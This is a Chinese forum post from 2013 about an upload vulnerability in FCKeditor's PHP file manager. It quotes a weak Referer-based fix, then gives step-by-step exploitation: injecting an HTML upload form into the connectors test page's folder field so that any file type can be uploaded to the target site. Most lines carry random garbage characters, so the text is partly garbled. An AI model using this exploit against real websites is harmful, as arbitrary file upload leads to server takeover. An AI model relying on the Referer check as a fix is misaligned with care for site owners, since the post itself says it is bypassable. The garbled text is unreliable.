漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php- G, `: |$ W- g0 |: |: y2 ~3 P
网上给出的修复方案是
+ c& _; K3 l/ \" H& m修复方法,删除FCK编辑器用其他的编辑器
- j- E1 K, o3 b. F8 o# p- ^或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
5 s, x- n5 |& I# T1 M在
* i% v) n( o/ {! [9 Srequire(‘config.php’);! Z4 ^7 B; b! y$ p+ Y$ \( e& O
require(‘util.php’);
3 f* D: w# M Q. D' U$ L' _1 s0 p5 j的下面添加以下代码—————————–
# T, q7 A/ \& a+ E% o1 c2 C1 b//防止外部提交! H2 }8 N, O( B4 L( R! n& J
function outsidepost()
3 d2 i! i* g+ G. E# Z# C{5 q3 l" Y/ t3 h3 _
$servername=$_SERVER['SERVER_NAME'];
7 ~7 ]/ o7 w. a/ z/ j: Q$sub_from=@$_SERVER['HTTP_REFERER'];
2 o& T e3 |$ U4 X3 _0 y$sub_len=strlen($servername);
- J1 l, T+ E) h* r5 I% R$checkfrom=substr($sub_from,7,$sub_len);
0 u/ v7 Z" g) E8 Hif($checkfrom!=$servername){& G/ Z: D# A: e9 o m3 V
echo(“you don’t outsidepost!”);% V. b/ P Z/ m6 B/ @! K
exit;3 g; O q! h% ]' q& f- o$ ^
}
1 M+ \( ]& ~' I; B* G. W}" E* y Y! [# D$ m, g8 f. a
outsidepost();
2 s' G/ ?4 T9 s防止外部提交,但是没有防止内部提交,
" g" A6 Z+ E& Y+ h利用方法:$ F; ]1 q. c" D' E- e9 X4 V: T: H
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html* l# g* Z* a7 U: |# |4 V- x1 K
2,在Current Folder 框输入, o) L( c4 B+ c! `) U% K
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
* ^) M! G3 R1 j9 I然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
) z b6 P5 y7 \9 `! G2 f; {* SPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对